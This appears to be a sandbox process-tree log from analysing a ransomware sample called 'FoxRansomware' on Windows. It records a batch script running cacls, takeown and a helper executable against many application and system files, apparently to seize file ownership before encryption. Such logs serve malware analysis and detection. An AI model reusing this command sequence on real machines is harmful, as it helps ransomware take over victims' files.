  depth 3 | PID 3264 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner
    depth 4 | PID 4056 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner
  depth 3 | PID 3268 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3004 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  depth 3 | PID 1904 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
  depth 3 | PID 2552 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
  depth 3 | PID 4024 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1258.TXT" -nobanner
    depth 4 | PID 2768 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CP1258.TXT" -nobanner
  depth 3 | PID 3096 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3140 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  depth 3 | PID 1644 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
  depth 3 | PID 2400 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 960 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner
    depth 4 | PID 2748 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "background.png" -nobanner
  depth 3 | PID 3104 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 1508 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  depth 3 | PID 3180 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
  depth 3 | PID 5676 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4528 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner
    depth 4 | PID 1724 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "tasks.xml" -nobanner
  depth 3 | PID 280 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 1956 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  depth 3 | PID 4028 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
  depth 3 | PID 4072 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
  depth 3 | PID 4060 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr0.dat" -nobanner
    depth 4 | PID 4472 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "qmgr0.dat" -nobanner
  depth 3 | PID 4572 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4648 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  depth 3 | PID 4724 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
  depth 3 | PID 4732 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" | Modifies file permissions
  depth 3 | PID 4740 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "license.html" -nobanner
    depth 4 | PID 3460 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "license.html" -nobanner
  depth 3 | PID 3464 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4588 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  depth 3 | PID 3348 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
  depth 3 | PID 3612 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" | Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 4032 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner
    depth 4 | PID 4444 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner
  depth 3 | PID 4460 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5740 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  depth 3 | PID 3352 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
  depth 3 | PID 3316 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 5652 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner
    depth 4 | PID 5572 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner
  depth 3 | PID 5556 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5616 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  depth 3 | PID 4560 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
  depth 3 | PID 5612 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
  depth 3 | PID 3728 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner
    depth 4 | PID 5620 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner
  depth 3 | PID 4320 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 220 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  depth 3 | PID 3320 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
  depth 3 | PID 5596 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
  depth 3 | PID 1680 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_received.gif" -nobanner
    depth 4 | PID 3776 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "forms_received.gif" -nobanner
  depth 3 | PID 3680 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5232 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  depth 3 | PID 5756 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
  depth 3 | PID 3824 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
  depth 3 | PID 5716 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_super.gif" -nobanner
    depth 4 | PID 3852 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "reviews_super.gif" -nobanner
  depth 3 | PID 2412 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3172 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  depth 3 | PID 3248 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
  depth 3 | PID 840 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
  depth 3 | PID 5704 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "submission_history.gif" -nobanner
    depth 4 | PID 4164 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "submission_history.gif" -nobanner
  depth 3 | PID 5748 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3220 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  depth 3 | PID 872 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
  depth 3 | PID 4104 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" | Suspicious use of AdjustPrivilegeToken
  depth 3 | PID 3832 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Identity-H" -nobanner
    depth 4 | PID 3828 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "Identity-H" -nobanner
  depth 3 | PID 4340 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5812 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  depth 3 | PID 5836 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
  depth 3 | PID 5876 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" | Modifies file permissions
  depth 3 | PID 5872 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner
    depth 4 | PID 5884 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner
  depth 3 | PID 5888 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5956 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  depth 3 | PID 5828 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
  depth 3 | PID 5636 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
  depth 3 | PID 5832 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZY______.PFB" -nobanner
    depth 4 | PID 4128 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "ZY______.PFB" -nobanner
  depth 3 | PID 4204 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4208 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  depth 3 | PID 4140 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
  depth 3 | PID 4252 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
  depth 3 | PID 4464 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt32.clx" -nobanner
    depth 4 | PID 4456 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "brt32.clx" -nobanner
  depth 3 | PID 4148 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 2436 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  depth 3 | PID 4272 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
  depth 3 | PID 4284 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" | Modifies file permissions
  depth 3 | PID 4408 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa.fca" -nobanner
    depth 4 | PID 4228 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "usa.fca" -nobanner
  depth 3 | PID 4296 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4380 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  depth 3 | PID 5180 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
  depth 3 | PID 1476 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" | Modifies file permissions
  depth 3 | PID 2468 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner
    depth 4 | PID 1116 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner
  depth 3 | PID 1772 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4304 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  depth 3 | PID 4596 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
  depth 3 | PID 4608 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
  depth 3 | PID 3980 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1251.TXT" -nobanner
    depth 4 | PID 4628 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "CP1251.TXT" -nobanner
  depth 3 | PID 604 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5912 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  depth 3 | PID 4760 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
  depth 3 | PID 1704 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" | Modifies file permissions
  depth 3 | PID 748 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner
    depth 4 | PID 1596 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner
  depth 3 | PID 4804 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4768 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  depth 3 | PID 4656 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
  depth 3 | PID 4864 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
  depth 3 | PID 4884 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner
    depth 4 | PID 4876 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "background.png" -nobanner
  depth 3 | PID 4920 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4848 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  depth 3 | PID 2600 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
  depth 3 | PID 4820 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" | Modifies file permissions
  depth 3 | PID 4996 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    depth 4 | PID 5036 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner
  depth 3 | PID 4636 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 5324 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  depth 3 | PID 4240 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
  depth 3 | PID 5980 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
  depth 3 | PID 6016 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    depth 4 | PID 6040 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "resource.xml" -nobanner
  depth 3 | PID 6056 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 6084 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  depth 3 | PID 6012 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
  depth 3 | PID 6108 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
  depth 3 | PID 1076 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "distribute_form.gif" -nobanner
    depth 4 | PID 3704 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "distribute_form.gif" -nobanner
  depth 3 | PID 3696 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 3712 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  depth 3 | PID 6104 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
  depth 3 | PID 6100 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
  depth 3 | PID 2488 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "main.css" -nobanner
    depth 4 | PID 5076 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "main.css" -nobanner
  depth 3 | PID 4888 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner

depth 2 | PID 4332 | C:\Windows\SysWOW64\cmd.exe | cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  depth 3 | PID 1784 | C:\Windows\SysWOW64\cacls.exe | cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
  depth 3 | PID 1700 | C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
  depth 3 | PID 5084 | C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "review_shared.gif" -nobanner
    depth 4 | PID 4372 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula "review_shared.gif" -nobanner
  depth 3 | PID 5096 | C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe | D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:4400
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:5000
-
-
